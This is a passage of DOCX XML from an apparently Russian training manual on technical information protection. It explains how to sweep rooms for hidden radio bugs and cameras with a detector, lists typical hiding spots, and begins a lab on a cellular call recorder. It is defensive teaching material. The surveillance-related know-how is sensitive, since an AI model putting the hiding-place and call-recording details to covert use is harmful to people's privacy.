          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461D46">
        <w:t>Рис 18 - основные элементы графического интерфейса, используемые в режиме поиска</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Текущий уровень радиосигнала отображается в реальном времени в виде графика пиковых значений (поз. 1, голубым цветом на заднем плане) и усредненных значений (поз. 2, зеленым цветом на переднем плане).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Графики отражают изменение радио обстановки за последние 3 секунды. Актуальное </w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(текущее)</w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> значение соответствует правой части графика, по мере «устаревания» значения сдвигаются влево.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>График пиковых значений (поз. 1 на Рис. 18) наглядно показывает характер сигнала (импульсный или непрерывный) и является аналогом «импульсного» режима современных поисковых устройств (режима поиска цифровых «жучков»). График усредненных значений (поз. 2 на Рис. 18) отображает среднюю мощность сигнала и является, по сути, реализацией «аналогового» режима (режим поиска аналоговых «жучков»). Поиск локального максимума сигнала можно производить с использованием любого из двух графиков, с учетом того, что для поиска цифровых «жучков» наиболее подходит, все же, «импульсный» режим, т.е. график пиковых значений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>График истории усредненных значений (поз. 3 на Рис. 18) предназначен для сохранения и отображения радиообстановки за более длительный интервал времени - 45 секунд. Для удобства график истории поделен на 3 блока по 15 секунд.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="904"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>В изделии предусмотрена автоматическая подстройка чувствительности - для этого необходимо в режиме поиска нажать и удерживать в течение 2 секунд кнопкуф. Автоматическая подстройка производится по уровню усредненного сигнала (график поз. 2 Рис. 18).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="904"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Регулировка порога срабатывания виброиндикации производится относительно усредненного уровня сигнала, отображаемого в реальном времени на шкале (поз. 6 Рис. 18), в полном динамическом диапазоне изделия, без привязки к выбранному уровню чувствительности. Эту шкалу можно использовать и для общей оценки радиоообстановки в текущий момент времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="904"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Использование режима поиска.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="904"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> Перед началом поиска, по возможности, необходимо выключить радиоизлучающие приборы (Wi-Fi, смартфоны, планшеты, компьютеры и другую бытовую и офисную технику). Это облегчит поиск, исключив лишние помехи, и позволит установить на изделии более высокую чувствительность.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="904"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> Полностью выдвиньте антенну изделия. Включите изделие. При включении изделие автоматически подстроит уровень чувствительности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="904"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> Начните обход помещения, держа изделие на расстоянии 0,3-0,5 метра от исследуемых поверхностей. Если на экране изделия отобразится максимальный уровень сигнала (зеленый график усредненных значений указывает максимум), нажмите и удерживайте в течение 2 секунд кнопку и Произойдет автоматическая подстройка чувствительности. Повторяйте эти действия, пока не будет выявлено место, в котором есть явный максимум излучения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="904"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Другая методика поиска: после автоматической подстройки чувствительности можно уменьшить ее на 2 уровня. Затем обследовать предполагаемые места установки «жучков» с расстояния не более 0,2 м. При появлении максимума сигнала еще уменьшить чувствительность и обследовать место с еще более близкого </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>расстояния (- 5..10 см) с целью более точного определения положения источника сигнала. Типичная картина данных по мере приближения к источнику радиопередачи при такой методике поиска показана на Рис. 19:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3840480" cy="2484120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="Рисунок 79" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image30.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0480" cy="2484120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00461D46">
        <w:t>Рис. 19. Увеличение уровня сигнала по мере приближения к аналоговому радиопередатчику</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> Если по всему помещению наблюдается достаточно высокий и постоянный уровень сигнала, это может говорить о наличии мощного внешнего источника радиопередачи (вышки сотовой связи, мощные точки доступа Wi-Fi). В этом случае попробуйте включить в изделии все фильтры и продолжите поиск.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>Если амплитуда сигнала на графике после включения фильтров значительно снизится, можно при помощи последовательного выключения и включения отдельных фильтров выяснить, какие именно радиосигналы мешают,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>и уменьшить их влияние, включив соответствующие фильтры и отключив ненужные.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> Вероятные места установки подслушивающих и подглядывающих устройств: полости и щели в плинтусах, стенах, за батареями отопления, труднодоступные места на шкафах, карнизах, полости подвесного потолка, вентиляционные шахты, элементы мебели, предметы бытового назначения, цветы, бортовая панель автомобиля, сиденья и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> Используйте режим акустоиндикации при поиске в труднодоступных местах, там, где сложно наблюдать за происходящим на экране. Учащение звуковых сигналов говорит о приближении к источнику радиопередачи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> Найденное место, в котором наблюдается максимальный уровень излучения, тщательно обследуйте на наличие беспроводных «жучков», при этом можно вручную регулировать чувствительность</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:t>Если при поиске на одном и том же месте (без перемещения изделия) на зеленом графике усредненных значений отчетливо видны резкие провалы и всплески, а на заднем плане (на синем графике пиковых значений) видны отчетливые пропуски, как это показано на Рис. 19 (а), то это говорит о высокой вероятности работы цифрового передатчика. О цифровом характере сигнала также свидетельствует наличие ярко выраженных интервалов передачи/паузы на графике пиковых значений, значительно более высокая амплитуда пиковых значений по сравнению с усредненными, как показано на Рис. 20 (б,в).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="904"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6187440" cy="1394460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Рисунок 80" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image3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7440" cy="1394460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="904"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="bookmark13"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>а)</w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>б)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>в)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="904"/>
        </w:tabs>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00461D46">
        <w:t>Рис. 20. Работа цифрового передатчика</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="904"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:t xml:space="preserve">В этом случае уменьшите чувствительность при помощи кнопки« </w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:t xml:space="preserve"> » до такого уровня, чтобы синий график пиковых значений не «зашкаливал». Можно также для этого частично или полностью сложить антенну. Продолжите поиск, ориентируясь уже на график пиковых значений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00461D46" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="904"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00461D46">
        <w:t xml:space="preserve">- При явном локальном максимуме неизвестного излучения можно перевести изделие в режим акустозавязки. Вблизи радиомикрофона («жучка») характер звука изменится. Из динамика изделия или в наушниках по мере приближения к «жучку» в отдельных случаях можно будет даже услышать те звуки, которыми озвучено </w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">помещение. </w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>GSM</w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>GPRS</w:t>
      </w:r>
      <w:r w:rsidRPr="00461D46">
        <w:t>-передатчики можно легко опознать по характерному треску. В режиме акустозавязки (при должном навыке) можно искать «жучки» исключительно на слух, даже не прибегая к графической информации на экране.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>Задания для выполнения лабораторной работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>Н</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>еобходимо проверить все места, из которых возможна скрытая съемка</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или скрытая закладка радиопередающих устройств любого типа</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007C6975" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6975">
        <w:t>смотреть наиболее подозрительные места с разных ракурсов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t xml:space="preserve">Во время работы с прибором  необходимо обнаружить и отразить в отчете следующие найденные устройства: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C73">
        <w:t>IP-камера для помещений Link 128;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C73">
        <w:t>Видеоглазок беспроводной  Radio DVR;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A04C73" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C73">
        <w:t>Видеокамера малогабаритная  JMC T-12;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C73">
        <w:t>Видеорегистратор L</w:t>
      </w:r>
      <w:r>
        <w:t>awMate PV-550SE с камерой 618СА;(П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A1004" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE0EB3">
        <w:t>Подавитель диктофонов Бубен-ультра</w:t>
      </w:r>
      <w:r>
        <w:t>.(П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="231" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="231" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc3808619"/>
      <w:r w:rsidRPr="00433A6D">
        <w:t>Практическая работа №1</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:bookmarkStart w:id="35" w:name="_Toc508055964"/>
      <w:r w:rsidRPr="00433A6D">
        <w:t>Автономный регистратор сотовых разговоров SpRecord SpGate MR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1464"/>
        </w:tabs>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1464"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A1256">
        <w:t>провести анализ автономного регистратора сотовых разговоров SpRecord SpGate MR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="001A1256" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1464"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Назначение</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>устройства</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:right="261" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">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xml:space="preserve"> предназначен для регистрации и записи сотовых телефонных разговоров на карту памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:right="258" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Для записи разговоров используется механизм организации телефонных конференций, предоставляемый сотовыми операторами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:right="263" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Основная </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SIM</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-карта, на номер которой приходят входящие вызовы, устанавливается в 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При  поступлении  входящего вызова сотовый регистратор организует конференцию с вашим телефоном, номер которого указан в</w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:spacing w:val="25"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>настройках.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433A6D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Основные функции устройства:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="414"/>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
